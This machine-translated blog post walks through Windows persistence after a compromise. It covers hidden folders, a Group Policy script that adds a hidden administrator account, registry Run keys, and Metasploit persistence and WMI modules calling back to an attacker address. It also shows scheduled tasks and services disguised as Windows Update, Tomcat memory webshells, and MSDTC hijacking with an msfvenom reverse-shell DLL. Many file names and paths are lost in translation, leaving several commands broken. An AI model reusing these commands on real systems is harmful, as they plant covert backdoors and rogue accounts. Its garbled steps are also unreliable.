Location>code7788 >text

Windows Permission Maintenance Summary

Popularity:570 ℃/2024-08-27 19:19:30

Windows privilege maintenance

I. Documentation level

1)attrib

Using the Attrib +s +a +h +r command

s: sets the System attribute a: sets the Archive attribute h: sets the Hidden attribute

r: Set the Read-only attribute (Read-only)

attrib +s +a +h +r c:\test
image-20240826151634883image-20240826151920188

After the command is executed, we don't see the test directory, but it exists and can be accessed.

If you want to see it, delete the corresponding attribute

image-20240826152530333

The test folder is showing up.

2) System icon hiding

It is possible to rename the folderMy computer. {20D04FE0-3AEA-1069-A2D8-08002B30309D}

image-20240826153334228

The icon becomes My Computer, and double-clicking on it also gets you to My Computer, but not to the contents of our folder.

But you can see the folder on the command line, and you can also access and view the contents of the folder

Common Folder Names

My computer. {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Recycle Bin. {645ff040-5081-101b-9f08-00aa002f954e}
Unplugged network. {992CFFA0-F557-101A-88EC-00DD010CCC48}
printer. {2227a280-3aea-1069-a2de-08002b30309d}
Control Panel. {21ec2020-3aea-1069-a2dd-08002b30309d}
Network Neighborhood. {208d2c60-3aea-1069-a2d7-08002b30309d}

3) Name of the deformity

Create a file with the nametest...\ The display name istest...

This file can be seen, but the internal files cannot be accessed or deleted.

md test...\
copy  test...\
image-20240826163357356

Deleting in the interactive interface shows that the item cannot be found.

image-20240826163713549

I'm getting an error when I open the file inside, and it won't let me see it.

image-20240826163845177

The only way to remove it is to execute the

  • /s Indicates that the files in the specified directory and all subdirectories are deleted recursively.
  • /q Indicates quiet mode, i.e., direct deletion without prompting for confirmation.
rd /s /q c:\test...\
image-20240826164429426

4) Driver-level file hiding

The most typical phenomenon of driver hiding is the presence of the following files in the system disk:

c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\
c:\WINDOWS\system32\drivers\

Drive hiding can be achieved with EasyFileLocker.

Download link./s/1h2_k1picYeinpz3XtI8ypA?pwd = 141d

Extract code: 141d

image-20240826194036485

Attributes can be selected to enable hiding of files
To delete

1. Query service status: sc qc xlkfs
2, stop the service: net stop xlkfs service stops, the driver level hidden files can be revealed!
3. Delete the service: sc delete xlkfs
4. Delete the files under the system directory and restart the system to make sure the services have been cleaned up.

II. Group Policy

The Group Policy backdoor is even more insidious, in that it can be executed automatically when the computer completes the corresponding operation. For example, the shutdown operation

echo off
net user lingx5$ 1234 /add
net localgroup administrators lingx5$ /add
exit

Copy this to the center.

This script is a way to add a lingx5 $: 1234 users, and puts thelingx5This user is added to theadministratorsuser group to$ The user at the end of the symbol is what we often refer to as a shadow user (hidden user). It is very difficult for the average user to discover this user name, and even if he discovers and deletes the user, at the next shutdown, the group policy we injected will still be enforced, and the user will be created again.

Win+r to open input --> locate "Computer Configuration I > Windows Settings I > Scripts (Startup/Shutdown)"

image-20240827092948069image-20240827093530325

In the shutdown properties add

image-20240827094201551

restart the computer

It was added successfully and is not viewable by the net user command

Group Policy can not only add users for maintenance, attackers can also put some malicious scripts or programs to run through the group policy, but also can sniff the administrator's password and so on.

III. Registry

1) Add manually

Registries are also commonly used by attackers as a means of defending their rights because the information in a registry is huge, so information in a registry can be much more hidden and difficult to troubleshoot.

  • reg add: is a command used to add or modify registry entries.
  • "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run": Specifies the registry path to be manipulated, which is the location used to store information about the current user's self-starting program.
  • /v Pentestlab: Set the name of the registry entry to be added to "loaclUser".(can be customized)
  • /t REG_SZ: Specifies that the data type of the registry entry is of string type (REG_SZ).
  • /d "C:\Users\tmp\": Set the value of the registry entry to "C:\Users\tmp\", i.e. specify the path of the self-starting program to this executable.(here to enact our * horse, backdoor program)
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"
reg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v
loaclUser /t REG_SZ /d "C:\Users\tmp\"

Two additional registry locations that could allow an attacker to achieve persistence by executing arbitrary payloads or DLLs. These will be executed during login and require administrator level privileges.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v
loaclUser /t REG_SZ /d "C:\tmp\"

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Dep
end" /v loaclUser /t REG_SZ /d "C:\tmp\"

2) meterpreter persistence

a) persistence module

Of course there are modules for automated additions in meterpreter, and when the machine goes live with our msf, you can use the module persistence

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set payload windows/x64/meterpreter/reverse_tcp 
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) > set session 1  
session => 1
msf6 exploit(windows/local/persistence) > set lhost 192.168.84.128
lhost => 192.168.84.128
msf6 exploit(windows/local/persistence) > set lport 4444
lport => 4444
msf6 exploit(windows/local/persistence) > set startup USER
startup => USER
msf6 exploit(windows/local/persistence) > run

[*] Running persistent module against DESKTOP-906JKQ3 via session ID: 1
[+] Persistent VBS script written on DESKTOP-906JKQ3 to C:\Users\lingx5\AppData\Local\Temp\
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[+] Installed autorun on DESKTOP-906JKQ3 as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svwTznRkXi
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.3418/DESKTOP-906JKQ3_20240827.
msf6 exploit(windows/local/persistence) > 

With the background command in meterpreter, use thewindows/local/persistenceModule DesignationThe id of the sessionand setup parameters, generate vbs scripts in the tmp directory, and automatically add registry tasks

image-20240827124404922

Just listen in kali and wait for the target to log in to connect

image-20240827124632140

This kind of has a disadvantage, that is, the program is not our own do not kill, it is easy to be killed by antivirus software, resulting in the * horse did not have a way online

b) persistence_exe module

meterpreter > background         
[*] Backgrounding session 1... 
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe
msf6 post(windows/manage/persistence_exe) > set session 1
session => 1
msf6 post(windows/manage/persistence_exe) > set rexepath /opt/win_exp/win_exp.exe
rexepath => /opt/win_exp/win_exp.exe
msf6 post(windows/manage/persistence_exe) > set rexename 
rexename => 
msf6 post(windows/manage/persistence_exe) > run

[*] Running module against DESKTOP-906JKQ3
[*] Reading Payload from file /opt/win_exp/win_exp.exe
[+] Persistent Script written to C:\Users\lingx5\AppData\Local\Temp\
[*] Executing script C:\Users\lingx5\AppData\Local\Temp\
[+] Agent executed with PID 2076
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dJggfAUjDAS
[*] Cleanup Meterpreter RC File: /home/kali/.msf4/logs/persistence/DESKTOP-906JKQ3_20240827.0058/DESKTOP-906JKQ3_20240827.
[*] Post module execution completed
msf6 post(windows/manage/persistence_exe) > 
image-20240827141359668

rexepath specifies to make the local no-kill/opt/win_exp/win_exp.exe

rexename specifies the name of the uploaded file.(It's usually the system's service name, which is harder to detect)The default file directory is the %TEMP% directory.

The downside is that you can't specify the path to the uploaded file and it's not well hidden.

Still recommend uploading with upload, manually adding registries, etc. to defend your rights

c) WMI Persistence

msf6 exploit(windows/local/wmi_persistence) > show options                                                                                        
Module options (exploit/windows/local/wmi_persistence):                                                                                          
   Name                Current Setting  Required  Description                                                                      
   ----                ---------------  --------  -----------
   CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
   CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
   EVENT_ID_TRIGGER    4624             yes       Event ID to trigger the payload. (Default: 4625)
   PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAIT
                                                  FOR)
   PROCESS_TRIGGER              yes       The process name to trigger the payload. (Default: )
   SESSION             1                yes       The session to run this module on
   USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
   WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)
Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '',seh,thread,process, none)
   LHOST     192.168.84.128   yes       The listen address (an interface may bespecified)
   LPORT     4444             yes       The listen port
   **DisablePayloadHandler: True   (no handler will be created!)**

Parameter Description:

  1. CALLBACK_INTERVAL: Specifies the interval between callbacks in milliseconds. The default is 1800000 milliseconds (30 minutes), which means that the persistent Payload is triggered every 30 minutes.
  2. CLASSNAME: The name of the WMI event class. This name is used in the target system to identify this persistence task. The default isUPDATER, you can change it to some other unobtrusive name.
  3. EVENT_ID_TRIGGER: Specifies which event ID triggers the Payload. default is4625This is a common logon failure event in Windows logs. You can change this to other event IDs if you want (e.g., the event ID of a successful logon).4624) to trigger Payloads more flexibly.
  4. PERSISTENCE_METHOD: Select the trigger method for persistence. The following are the available trigger methods:
    • EVENT: Triggered based on event ID (e.g. login failure event).
    • INTERVAL: periodic triggers (based onCALLBACK_INTERVAL)。
    • LOGON: Triggered when the user logs in.
    • PROCESS: Triggered when the specified process is started (e.g., the)。
    • WAITFOR: Triggered when the system is waiting for a specific keyword.
  5. PROCESS_TRIGGER:: Only ifPERSISTENCE_METHOD set toPROCESS When valid, specify the name of the process to be monitored. Payload is triggered when this process is started. The default is, which you can change to any other legitimate process you wish to monitor.
  6. SESSION: The target session (session ID) on which you want to run the module. This parameter must be set.
  7. USERNAME_TRIGGER:: Only ifPERSISTENCE_METHOD set toLOGON The payload is triggered when the user name logs in.BOB, you can change to the actual username in the target system.
  8. WAITFOR_TRIGGER:: Only ifPERSISTENCE_METHOD set toWAITFOR When valid, specifies the keyword that triggers the Payload. The default isCALL

Payload Options (windows/x64/meterpreter/reverse_tcp)

  1. EXITFUNC: Specifies the method of exit:
    • process: Default option, ends the current process on exit.
    • seh: Exit using the Structured Exception Handling (SEH) mechanism.
    • thread: Only the current thread is terminated on exit.
    • none:: No exit action is taken.
  2. LHOST: The listening address (IP) of your attacking machine. This is the address of the target system's return connection, usually your local IP or VPS IP.
  3. LPORT: The listening port of your attacker. The target system will connect to this port when it returns.
  4. DisablePayloadHandler: If set toTrueMetasploit does not automatically start the Payload's handler. This is often used to avoid conflicts when other listeners are already running.

typical example

use windows/local/wmi_persistence
set session 1
set persistence_method EVENT
set event_id_trigger 4624
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.84.128
set lport 4444
run

One thing to keep in mind though:To use this module, we have to get admin access to the target system.

d) Adding users

post/windows/manage/add_userCreate a hidden user with administrator rights to revisit later.

use post/linux/manage/add_user
set session 1
set USER test
set PASS 1234
run
image-20240827151529539

I have normal user permissions here, so it didn't add successfully

You also need to get the permission to add users to be able to add them successfully.

e) Creation of services

persistence_serviceThis module creates new services for the purpose of privilege maintenance

use exploit/windows/local/persistence_service

set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.84.128
set LPORT 4444
set REMOTE_EXE_NAME 
set SERVICE_NAME WindowsUpdateService
set SERVICE_DISPLAY_NAME "Windows Update Service"
set SERVICE_DESCRIPTION "Provides updates for the Windows operating system."
set STARTUP auto

run

Requires administrator privileges

IV. Planned tasks

The Windows operating system provides a utility () that enables system administrators to execute programs or scripts at specific dates and times.
This behavior can be exploited by attackers as a persistence mechanism. Performing persistence through scheduled tasks does not require administrator privileges, but can be exploited by an attacker who has been given access to a program to perform persistence through a scheduled task.
The elevated privileges allow further operations, such as performing tasks during user login or during an idle state.

SCHTASKS is a built-in command line tool in Windows that can be used to create, delete and manage scheduled tasks.

schtasks /create /tn "Windows Update Service" /tr "C:\Windows\System32\" /sc onlogon /ru "SYSTEM"

Parameter Explanation:

  • /create: Create a new task.
  • /tn "Windows Update Service": Task name (here disguised as "Windows Update Service").
  • /tr "C:\Windows\System32\": The path of the program to be executed by the task.
  • /sc onlogon: Trigger for the task, set here to be triggered when the user logs in (you can also set other triggers, such as system startup)/sc onstart)。
  • /ru "SYSTEM": Run the task with SYSTEM privileges (this is often used to ensure elevated privilege execution).

Common Trigger Conditions:

  • /sc minute:: Executed every few minutes.
  • /sc daily:: Implemented on a daily basis.
  • /sc onstart: Executed at system startup.
  • /sc onlogon: Executed when the user logs in.

Validation:

schtasks /query /tn "Windows Update Service"

V. Creating services

Services in the Windows environment may result in elevated privileges if they are not properly configured or if they can be used as a persistence method. Creating a new service requires administrator-level privileges, and it is no longer a covert persistence technique. However, in a red team operation, targeting companies that are immature in threat detection can be used to create further disruption, and organizations should build SOC capabilities to identify threats that use basic techniques in their malware.

sc create ServiceName binPath= "C:\Path\To\Your\" start= auto

image-20240827162019695

  • ServiceName:Define your own more cryptic service name.
  • binPath : Specify the path where the backdoor script exists
  • start : Start-up mode

PowerShell creates a new service

New-Service -Name "SystemUpdate" -BinaryPathName "C:\temp\" -Description "systemupdate" -StartupType Automatic

sc start pentestlab

Memory

Memory horses are a form of fileless attacks. Fileless attacks can effectively evade detection by traditional security software by executing remotely loaded in the system's memory, residing in the registry, or abusing commonly used whitelisting tools such as PowerShell, WMl and PsExec. Fileless attack techniques allow attackers to access the system to enable subsequent malicious activity. By manipulating vulnerability exploits, legitimate tools, macros and scripts, an attacker can compromise a system, elevate privileges or spread malicious code laterally across a network. Moreover, fileless threats leave no trace after execution, which makes them difficult to detect and remove.

Memory horses don't land on files and are hard to detect by traffic monitoring systems, so they are hard to find and troubleshoot

principle

memory injection:

  • Memory horses reside in memory without touching the disk by injecting malicious code directly into the memory of the target process or by loading malicious classes and functions. This injection avoids traditional disk-based detection means such as antivirus software or file integrity monitoring.

Hooking Key Components:

  • Memory horses typically enable malicious code to intercept, modify, or execute specific requests by hooking into system APIs, web server request handling functions, or the core logic of an application framework. For example:
    • In Web containers (e.g. Tomcat, JBoss, WebLogic), the memory horse can hook theServlet maybeFilter component that listens for HTTP requests and executes malicious logic when a specific request arrives.
    • NET environments, Memory Horse may hook into the HTTP request processing pipeline.

categorization

1.servlet-api type :Dynamically register a new listener, filter or servlet through command execution to realize command execution and other functions. Specific frameworks, containers, memory horse principle is similar to this, such as spring's controller memory horse, tomcat valve memory horse

2.Byte Code Enhanced. Dynamic modification of existing code through the java instrumentation, and then realize the command execution and other functions.

Common is the java memory horse, which is related to the process of java request processing:

The client initiates an http request, say of type get.
Servlet container receives the request and encapsulates it into HttpServletRequest and HttpServletResponse objects based on the request information.
The Servlet container calls the init() method of the HttpServlet. The init method is called only on the first request.
The Servlet container calls the service() method.
The service() method calls the doGet or doPost method according to the request type, which is get, and here the doGet method is called.
Here we call the doGet method. In the doGet method, we write our own business logic.
After the business logic is processed, it is returned to the Servlet container, which then returns the results to the client.
When the container is closed, the destory method is called.

In the doGet method, we write malicious code, which will be loaded into the system memory by the servlet container, thus achieving the purpose of memory horse injection

realization

Take the servletAPI-type memory shield of tomcat as an example to talk about the implementation of memory shield.
Create a malicious servlet, then get the current StandardContext, then wrap the malicious servlet into a wrapper and add it to the
Among the children of StandardContext, finally add ServletMapping to bind the access URL to the wrapper.
0x00 Hijacking Backdoor

But the memory horse still has a drawback: as soon as the container or service is shut down and restarted, the destory() method will be called, killing the memory horse and recycled by jvm's garbage collection mechanism.

VII. Hijacking the back door

Introduction to MSDTC

is the Microsoft Distributed Transport Coordinator program. The process calls the systems Microsoft Personal Web Server and Microsoft SQL
Server. which is used to manage multiple servers.
is a concurrent transaction that is distributed across more than two databases, message queues, file systems, or other transaction-protected resource managers, deleting the
Be careful.
Corresponding service MSDTC, full name Distributed Transaction Coordinator, Windows system default start the service

image-20240827183717262

Corresponding process, located at %windir%system32

principle

The attack begins when the Windows operating system starts the Microsoft Distributed Transaction Processing Coordinator (MSDTC) service, which coordinates transactions across multiple resource managers such as databases, message queues, and file systems. When the target computer joins the domain, once the MSDTC service starts, it searches the registry. When a computer joins a domain, the MSDTC service searches the registry once it starts

HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftMSDTC\MTxOCI

The MTxOCI component of the MSDTC service searches for three DLLs:respond in singingWindows systems are not packaged by default.
contains, we write our own malicious one and place it in the%SystemRoot%\ system32 \in. Ready, use the remote job command to kill the MSDTC service (taskkill / im / f), which causes MSDTC to reload itself. However, this time it will look for and find it. This time it will take advantage of this service to pull up our backdoor dll.

realization

Create a dll file

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.84.128 LPORT=4444 -f dll >

Upload the generated file to the C:\Windows\System32 directory of the target machine.

upload  C:\Windows
shell
C:\Windows>move  c:\Windows\System32

Put in system32 and restart the msdtc service.

taskkill /f /im 

Reboot msdtc

net start msdtc

All of my articles are for technical sharing, they are used for documentation for defense purposes, and all operations are carried out in an experimental environment, so please do not use them for any other purpose, or suffer the consequences.